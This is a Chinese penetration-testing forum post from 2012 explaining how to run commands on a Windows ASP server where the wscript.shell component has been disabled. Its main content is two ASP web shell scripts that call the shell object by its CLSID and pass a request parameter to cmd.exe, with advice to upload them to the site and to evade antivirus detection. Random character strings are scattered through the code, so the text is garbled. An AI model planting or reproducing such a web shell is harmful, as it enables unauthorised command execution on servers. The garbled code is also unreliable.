找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2630|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。3 M0 e" q, s( U) g
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。1 h- X/ _# E+ B' ~+ ^
  • 要想让运行命令可以试试这种方法,成功率为五五之数。# g3 E: T0 a* U# N  ?) s
  • 把下面代码复制:
    & L& M! w7 Q% M' B$ Z  I6 S8 n' o
  • <%
    " V7 |9 f1 r+ I2 Y# I# h
  • end if
    ; U) |& N* H! x
  • response.write(”")3 i9 A9 o5 @1 {7 n6 k8 b& _
  • On Error Resume
    7 i5 h) t. `: [$ L5 P
  • Next
    , E5 }( V" [2 U/ B" q
  • response.write oScriptlhn.exec(”cmd.exe /c” & 6 {; y4 b) f0 c9 `3 o
  • request(”c”)).stdout.readall( U8 z- ?, s' d5 P
  • response.write(”")
    3 Y5 c- |/ q2 C) s4 o/ }
  • response.write(”")( e  ]) ]( ^, t& f& N  ~: J' l6 N
  • response.write(”4 M1 T" _" s, Y- ?/ n! ^8 G0 d$ Q
  • “)+ ]! N  V: P2 V2 s$ {/ d, i; ]5 E$ j
  • response.write(”")7 `$ o/ ?+ y  U& q  d  c. X' \
  • %>
    & w- I( j0 I- g( G& R& V" |
  • 保存为一个asp文件,然后传到网站目录上去6 ~1 n! c5 V5 b1 }# A
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。3 b. b+ S& C# N- H) j) ~0 I1 g$ X7 s
  • 我用此成功运行过cacls命令。0 M" a2 n* y7 F
  • 第二那就是运行时出错,可能限制某些代码执行2 S8 Q& M% L, C/ J* z* G* `$ P* n
  • 无wscript.shell组件提权又一个方法
    4 E* M. H, M; [1 g
  • <object runat=server id=oScriptlhn scope=page
    - z; U% v* X+ s0 D$ E
  • 3 i3 _( o7 y$ }/ k, O0 l9 x/ }  z
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
    % q% y% T1 @) y  b% R& j
  • <%if err then%> - n& ]$ i3 E! e- q) Y
  • <object runat=server id=oScriptlhn scope=page ) Y( n4 l% Y5 N- o& R! Q4 I

  • 2 U) _, [. v9 W: F6 {2 v: P
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
    9 q3 ]) a; \" E" D& _8 J8 x
  • <%
    ( c  h1 ?" [) e) Y  ^
  • end if & |' C2 l6 y2 o8 V8 X, m
  • response.write(”<textarea readonly cols=80
    ! w2 k4 J1 L) ~9 F
  • - B3 W: {0 w9 X- A4 T$ p
  • rows=20>”) + ~4 s, H1 d- O5 u/ ?8 R7 W2 `
  • On Error Resume Next
    8 a6 t2 A4 J) R, |
  • response.write & u" b5 p+ ?' z  P3 z! M1 y. p7 ]& f" }
  • / @  K* u, f* V. `) u& K- s- T
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    6 D6 ?' }4 k2 t! U( X
  • response.write(”</textarea>”) , Q8 e: V6 k# l2 T' \1 c4 a+ k
  • response.write(”<form
    . L! S( @$ H$ n! S% R" m

  • ( \; o4 ^: I, r: ~+ q; h+ u
  • method=’post’>”) : ~- p# y, Y7 w  E( I2 L
  • response.write(”<input type=text name=’c'
    + a7 c9 H9 ~, d6 T' }
  • $ u: _/ V7 @9 _* t; V* y
  • size=60><br>”) " ~8 p: h$ u( V; [3 n
  • response.write(”<input type=submit & U  C. R& @: m8 }, K
  • 4 K  \  b* n$ A
  • value=’执行’></form>”) ( Y" r: h/ x* Q6 Z1 r7 w, w2 J
  • %>
      ]2 [# i3 m1 ~  n, R
  • 保存为ASP,此代码可能被杀,请注意免杀。
    2 {" k; @! S# q2 Q0 ~0 E: d4 _
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建; t. o* `5 }5 I, V
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表